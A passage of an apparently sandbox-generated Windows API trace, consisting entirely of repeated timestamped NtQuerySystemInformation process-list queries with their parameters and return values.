ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0107.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0107.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ee8) returned 0x0 [0108.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0108.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0108.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0108.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0108.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0108.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0108.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19ea8) returned 0x0 [0108.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19fb8) returned 0x0 [0108.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19fb8) returned 0x0 [0108.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19fb8) returned 0x0 [0108.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19fb8) returned 0x0 [0108.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19fb8) returned 0x0 [0108.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19fb8) returned 0x0 [0108.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19fb8) returned 0x0 [0108.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3276150, Length=0x241a8, ResultLength=0x53ff7ec | out: SystemInformation=0x3276150, ResultLength=0x53ff7ec*=0x19f78) returned 0x0 [0108.456] NtQuerySystemInformation (in: 